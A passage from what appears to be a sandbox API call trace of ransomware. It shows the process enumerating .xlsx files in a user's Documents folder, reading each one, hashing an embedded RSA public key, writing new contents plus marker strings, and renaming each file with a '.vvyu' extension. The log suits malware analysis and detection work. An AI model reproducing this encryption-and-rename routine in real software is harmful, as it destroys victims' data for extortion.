HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.168] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16f8d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16f8d, lpOverlapped=0x0) returned 1 [0189.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.169] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16f92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.170] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.171] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.172] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.172] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.172] CloseHandle (hObject=0x584) returned 1 [0189.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af1f88 [0189.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.175] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\LIaaFON99laH9NU_j.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\liaafon99lah9nu_j.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\LIaaFON99laH9NU_j.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\liaafon99lah9nu_j.xlsx.vvyu")) returned 1 [0189.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.176] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0189.180] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd829730, ftCreationTime.dwHighDateTime=0x1d89cdc, ftLastAccessTime.dwLowDateTime=0x8077130, ftLastAccessTime.dwHighDateTime=0x1d89cec, ftLastWriteTime.dwLowDateTime=0x8077130, ftLastWriteTime.dwHighDateTime=0x1d89cec, nFileSizeHigh=0x0, nFileSizeLow=0x1233b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M-_W92CtTuHd9hF.xlsx", cAlternateFileName="M-_W92~1.XLS")) returned 1 [0189.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2b18 [0189.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0189.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2b18 | out: hHeap=0x2c0000) returned 1 [0189.180] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\M-_W92CtTuHd9hF.xlsx") returned=".xlsx" [0189.180] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\M-_W92CtTuHd9hF.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\m-_w92cttuhd9hf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.181] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=74555) returned 1 [0189.181] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.185] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12315, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.185] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.187] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.187] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1233b, lpOverlapped=0x0) returned 1 [0189.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.189] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.189] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.190] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.190] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.190] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.190] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.190] GetLastError () returned 0x0 [0189.190] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.190] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.191] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.191] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.191] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12340) returned 0x2af5168 [0189.191] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2b18 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2b60 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.192] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0189.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dad8 [0189.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dac0 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.195] GetCurrentThreadId () returned 0x5d8 [0189.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4218 [0189.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.196] GetCurrentThreadId () returned 0x5d8 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dad8 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db38 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db50 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daf0 [0189.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dac0 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.200] HeapFree (in: 